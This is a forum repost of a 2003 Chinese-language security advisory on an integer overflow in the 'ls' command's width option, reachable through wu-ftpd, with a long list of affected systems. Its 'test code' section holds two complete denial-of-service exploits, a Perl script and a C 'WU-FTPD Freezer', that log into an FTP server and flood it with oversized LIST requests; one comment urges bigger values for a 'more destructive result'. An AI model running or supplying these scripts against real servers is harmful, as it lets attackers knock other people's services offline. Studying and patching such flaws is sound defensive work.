|
阅读:372回复:0
Coreutils ls命令宽度超长参数整数溢出漏洞
Coreutils ls命令宽度超长参数整数溢出漏洞
发布时间:2003-10-22 更新时间:2003-11-03 严重程度:中 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:8875 受影响系统 GNU fileutils 4.0 +Debian Linux 2.2 68k +Debian Linux 2.2 alpha +Debian Linux 2.2 arm +Debian Linux 2.2 IA-32 +Debian Linux 2.2 powerpc +Debian Linux 2.2 sparc +Immunix Immunix OS 7+ +RedHat Linux 6.2 +RedHat Linux 6.2 i386 +RedHat Linux 7.0 +RedHat Linux 7.0 i386 +Slackware Linux 7.0 +Slackware Linux 7.1 GNU fileutils 4.0.36 +RedHat Linux 7.1 +RedHat Linux 7.1 i386 +RedHat Linux for iSeries 7.1 +RedHat Linux for pSeries 7.1 GNU fileutils 4.1 +Caldera OpenLinux Server 3.1 +Caldera OpenLinux Server 3.1.1 +Caldera OpenLinux Workstation 3.1 +Caldera OpenLinux Workstation 3.1.1 +RedHat Linux 7.2 +RedHat Linux 7.2 alpha +RedHat Linux 7.2 i386 +RedHat Linux 7.2 ia64 +RedHat Linux 7.3 +RedHat Linux 7.3 i386 +S.u.S.E. Linux 7.0 alpha +S.u.S.E. Linux 7.0 i386 +S.u.S.E. Linux 7.0 ppc +S.u.S.E. Linux 7.0 sparc +S.u.S.E. Linux 7.1 alpha +S.u.S.E. Linux 7.1 ppc +S.u.S.E. Linux 7.1 sparc +S.u.S.E. Linux 7.1 x86 +S.u.S.E. Linux 7.2 i386 +S.u.S.E. Linux 7.3 i386 +S.u.S.E. Linux 7.3 ppc +S.u.S.E. Linux 7.3 sparc +Slackware Linux 8.0 +Sun Cobalt Qube 3 +Sun Cobalt RaQ 4 +Sun Cobalt RaQ 550 +Sun Cobalt RaQ XTR +Sun Linux 5.0 +Sun Linux 5.0.3 +Sun Linux 5.0.5 +Sun Linux 5.0.6 +Sun LX50 +Trustix Secure Linux 1.1 +Trustix Secure Linux 1.2 +Trustix Secure Linux 1.5 GNU fileutils 4.1.6 +Sun Linux 5.0.6 GNU fileutils 4.1.7 Washington University wu-ftpd 2.4.1 Washington University wu-ftpd 2.4.2 academ[BETA1-15 +Caldera OpenLinux Standard 1.2 Washington University wu-ftpd 2.4.2 academ[BETA-18] +RedHat Linux 5.2 i386 Washington University wu-ftpd 2.4.2 VR17 Washington University wu-ftpd 2.4.2 VR16 Washington University wu-ftpd 2.4.2 (beta 18) VR9 Washington University wu-ftpd 2.4.2 (beta 18) VR8 Washington University wu-ftpd 2.4.2 (beta 18) VR7 Washington University wu-ftpd 2.4.2 (beta 18) VR6 Washington University wu-ftpd 2.4.2 (beta 18) VR5 Washington University wu-ftpd 2.4.2 (beta 18) VR4 Washington University wu-ftpd 2.4.2 (beta 18) VR15 Washington University wu-ftpd 2.4.2 (beta 18) VR14 Washington University wu-ftpd 2.4.2 (beta 18) VR13 Washington University wu-ftpd 2.4.2 (beta 18) VR12 Washington University wu-ftpd 2.4.2 (beta 18) VR11 Washington University wu-ftpd 2.4.2 (beta 18) VR10 Washington University wu-ftpd 2.5 .0 +Caldera OpenLinux 2.4 +Caldera OpenLinux Desktop 2.3 +RedHat Linux 6.0 +RedHat Linux 6.0 alpha +RedHat Linux 6.0 sparc +SCO eDesktop 2.4 +SCO eServer 2.3 +SCO eServer 2.3.1 Washington University wu-ftpd 2.6 .0 +Cobalt Qube 1.0 +Conectiva Linux 4.0 +Conectiva Linux 4.0 es +Conectiva Linux 4.1 +Conectiva Linux 4.2 +Conectiva Linux 5.0 +Conectiva Linux 5.1 +Debian Linux 2.2 +Debian Linux 2.2 68k +Debian Linux 2.2 alpha +Debian Linux 2.2 arm +Debian Linux 2.2 powerpc +Debian Linux 2.2 sparc -FreeBSD FreeBSD 4.3 -FreeBSD FreeBSD 4.3 -RELEASE -FreeBSD FreeBSD 4.3 -STABLE -FreeBSD FreeBSD 4.4 +HP HP-UX 11.0 +HP HP-UX 11.11 +RedHat Linux 5.2 alpha +RedHat Linux 5.2 i386 +RedHat Linux 5.2 sparc +RedHat Linux 6.0 +RedHat Linux 6.0 alpha +RedHat Linux 6.0 sparc +RedHat Linux 6.1 alpha +RedHat Linux 6.1 i386 +RedHat Linux 6.1 sparc +RedHat Linux 6.2 alpha +RedHat Linux 6.2 i386 +RedHat Linux 6.2 sparc +S.u.S.E. Linux 6.1 +S.u.S.E. Linux 6.1 alpha +S.u.S.E. Linux 6.2 +S.u.S.E. Linux 6.3 +S.u.S.E. Linux 6.3 alpha +S.u.S.E. Linux 6.3 ppc +S.u.S.E. Linux 6.4 +S.u.S.E. Linux 6.4 alpha +S.u.S.E. Linux 6.4 ppc +S.u.S.E. Linux 7.0 alpha +S.u.S.E. Linux 7.0 i386 +S.u.S.E. Linux 7.0 ppc +S.u.S.E. Linux 7.0 sparc +S.u.S.E. Linux 7.1 alpha +S.u.S.E. Linux 7.1 ppc +S.u.S.E. Linux 7.1 sparc +S.u.S.E. Linux 7.1 x86 +S.u.S.E. Linux 7.2 i386 +S.u.S.E. Linux 7.3 i386 +S.u.S.E. Linux 7.3 ppc +S.u.S.E. Linux 7.3 sparc +TurboLinux Turbo Linux 4.0 +Wirex Immunix OS 6.2 Washington University wu-ftpd 2.6.1 +Caldera OpenLinux 2.3 +Caldera OpenLinux Server 3.1 +Cobalt Qube 1.0 +Conectiva Linux 6.0 +Conectiva Linux 7.0 +Conectiva Linux 8.0 -FreeBSD FreeBSD 4.3 -FreeBSD FreeBSD 4.3 -RELEASE -FreeBSD FreeBSD 4.3 -STABLE -FreeBSD FreeBSD 4.4 -FreeBSD FreeBSD 5.0 -FreeBSD FreeBSD 5.0 alpha +MandrakeSoft Corporate Server 1.0.1 +MandrakeSoft Linux Mandrake 6.0 +MandrakeSoft Linux Mandrake 6.1 +MandrakeSoft Linux Mandrake 7.0 +MandrakeSoft Linux Mandrake 7.1 +MandrakeSoft Linux Mandrake 7.2 +MandrakeSoft Linux Mandrake 8.0 +MandrakeSoft Linux Mandrake 8.0 ppc +MandrakeSoft Linux Mandrake 8.1 +RedHat Linux 7.0 alpha +RedHat Linux 7.0 i386 +RedHat Linux 7.0 sparc +RedHat Linux 7.1 alpha +RedHat Linux 7.1 i386 +RedHat Linux 7.1 i586 +RedHat Linux 7.1 i686 +RedHat Linux 7.1 ia64 +RedHat Linux 7.1 noarch +RedHat Linux 7.2 alpha +RedHat Linux 7.2 athlon +RedHat Linux 7.2 i386 +RedHat Linux 7.2 i586 +RedHat Linux 7.2 i686 +RedHat Linux 7.2 ia64 +RedHat Linux 7.2 noarch -S.u.S.E. Linux 7.0 -S.u.S.E. Linux 7.0 alpha -S.u.S.E. Linux 7.0 ppc -S.u.S.E. Linux 7.0 sparc -S.u.S.E. Linux 7.1 -S.u.S.E. Linux 7.1 alpha -S.u.S.E. Linux 7.1 ppc -S.u.S.E. Linux 7.1 sparc -S.u.S.E. Linux 7.1 x86 -S.u.S.E. Linux 7.2 -S.u.S.E. Linux 7.3 +SCO eDesktop 2.4 +SCO eServer 2.3.1 +SCO Open Server 5.0 +SCO Open Server 5.0.1 +SCO Open Server 5.0.2 +SCO Open Server 5.0.3 +SCO Open Server 5.0.4 +SCO Open Server 5.0.5 +SCO Open Server 5.0.6 +SCO Open Server 5.0.6 a -Slackware Linux 7.0 -Slackware Linux 7.1 -Slackware Linux 8.0 +TurboLinux TL Workstation 6.1 +TurboLinux Turbo Linux 6.0 +TurboLinux Turbo Linux 6.0.1 +TurboLinux Turbo Linux 6.0.2 +TurboLinux Turbo Linux 6.0.3 +TurboLinux Turbo Linux 6.0.4 +TurboLinux Turbo Linux 6.0.5 +Wirex Immunix OS 7+ +Wirex Immunix OS 7.0 +Wirex Immunix OS 7.0 -Beta Washington University wu-ftpd 2.6.2 +Compaq Tru64 4.0 b +Compaq Tru64 4.0 d +Compaq Tru64 4.0 d PK9 (BL17) +Compaq Tru64 4.0 e +Compaq Tru64 4.0 f +Compaq Tru64 4.0 f PK6 (BL17) +Compaq Tru64 4.0 f PK7 (BL18) +Compaq Tru64 4.0 g +Compaq Tru64 4.0 g PK3 (BL17) +Compaq Tru64 5.0 +Compaq Tru64 5.0 PK4 (BL17) +Compaq Tru64 5.0 PK4 (BL18) +Compaq Tru64 5.0 a +Compaq Tru64 5.0 a PK3 (BL17) +Compaq Tru64 5.0 f +Compaq Tru64 5.1 +Compaq Tru64 5.1 PK3 (BL17) +Compaq Tru64 5.1 PK4 (BL18) +Compaq Tru64 5.1 PK5 (BL19) +Compaq Tru64 5.1 PK6 (BL20) +Compaq Tru64 5.1 a +Compaq Tru64 5.1 a PK1 (BL1) +Compaq Tru64 5.1 a PK2 (BL2) +Compaq Tru64 5.1 a PK3 (BL3) +Compaq Tru64 5.1 a PK4 (BL21) +Compaq Tru64 5.1 a PK5 (BL23) +Compaq Tru64 5.1 b +Compaq Tru64 5.1 b PK1 (BL1) +Compaq Tru64 5.1 b PK2 (BL22) +Conectiva Linux 9.0 +Debian Linux 3.0 +Debian Linux 3.0 alpha +Debian Linux 3.0 arm +Debian Linux 3.0 hppa +Debian Linux 3.0 ia-32 +Debian Linux 3.0 ia-64 +Debian Linux 3.0 m68k +Debian Linux 3.0 mips +Debian Linux 3.0 mipsel +Debian Linux 3.0 ppc +Debian Linux 3.0 s/390 +Debian Linux 3.0 sparc +MandrakeSoft Linux Mandrake 8.2 +MandrakeSoft Linux Mandrake 8.2 ppc +Sun Linux 5.0.7 Washington University wu-ftpd 2.6.2 +TurboLinux TL Advanced Server 6.0 +TurboLinux TL Server 6.1 +TurboLinux TL Workstation 6.0 详细描述 Coreutils 'ls'命令实现上存在整数溢出问题,当程序处理宽度和列数命令行参数时存在漏洞,当处理超长的参数时会导致整数溢出,溢出后的整数值可能使程序发生非预期的行为。其他调用'ls'命令的软件可能因此导致拒绝服务攻击。 测试代码 #!/usr/bin/perl # DoS sploit for ls # tested against wu-ftpd 2.6.2 # coded by (c) druid # greets to viator use Net::FTP; (($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>"; my $user = "anonymous"; my $pass = "halt\@xyu.com"; $cols=1000000;#you can increase this value for more destructive result ;) print ":: Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!"; print "Connected!\n"; $ftp->login($user, $pass) || die "could not login: $!"; print "Logged in!\n"; $ftp->cwd("/"); while ($count) { $ftp->ls("-w $cols -C"); $count--; } print "Done!\n"; $ftp->quit; /* * * http://www.rosiello.org * (c) Rosiello Security * * Copyright Rosiello Security 2003 * All Rights reserved. * * Tested on Red Hat 9.0 * * Author: Angelo Rosiello * Mail : [email protected] * URL : http://www.rosiello.org * * This software is only for educational purpose. * Do not use it against machines different from yours. * Respect law. * */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <string.h> void addr_initialize( ); void usage( ); int main( int argc, char **argv ) { int i, sd, PORT, loop, error; char user[30], password[30], ch; struct sockaddr_in server_addr; fprintf( stdout, "\n(c) Rosiello Security 2003\n" ); fprintf( stdout, "http://www.rosiello.org\n" ); fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" ); if( argc != 6 ) usage( argv[0] ); if( strlen( argv[3] ) > 20 ) exit( 0 ); if( strlen( argv[4] ) > 20 ) exit( 0 ); sprintf( user, "USER %s\n", argv[3] ); sprintf( password, "PASS %s\n", argv[4] ); PORT = atoi( argv[2] ); loop = atoi( argv[5] ); addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] )); sd = socket( AF_INET, SOCK_STREAM, 0 ); error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr )); if( error != 0 ) { perror( "Something wrong with the connection" ); exit( 0 ); } while ( ch != '\n' ) { recv( sd, &ch, 1, 0); printf("%c", ch ); } ch = '\0'; printf( "Connection executed, now waiting to log in...\n" ); printf( "%s", user ); send( sd, user, strlen( user ), 0 ); while ( ch != '\n' ) { recv( sd, &ch, 1, 0); printf("%c", ch ); } printf( "%s", password ); ch = '\0'; send( sd, password, strlen( password ), 0 ); while ( ch != '\n' ) { recv( sd, &ch, 1, 0); printf("%c", ch ); } printf( "Sending the DoS query\n" ); for( i=0; i<loop; i++ ) { write( sd, "LIST -w 1000000 -C\n", 19 ); } printf( "All done\n" ); close( sd ); return 0; } void addr_initialize (struct sockaddr_in *address, int port, long IPaddr) { address -> sin_family = AF_INET; address -> sin_port = htons((u_short)port); address -> sin_addr.s_addr = IPaddr; } void usage( char *program ) { fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program); exit(0); } 解决方案 各厂商已经在最新版本的fileutils软件包中修补了此漏洞。 相关信息 WU-FTPD 2.6.2 Freezer http://archives.neohapsis.com/archives/bugtraq/2003-10/0331.html |
|
|
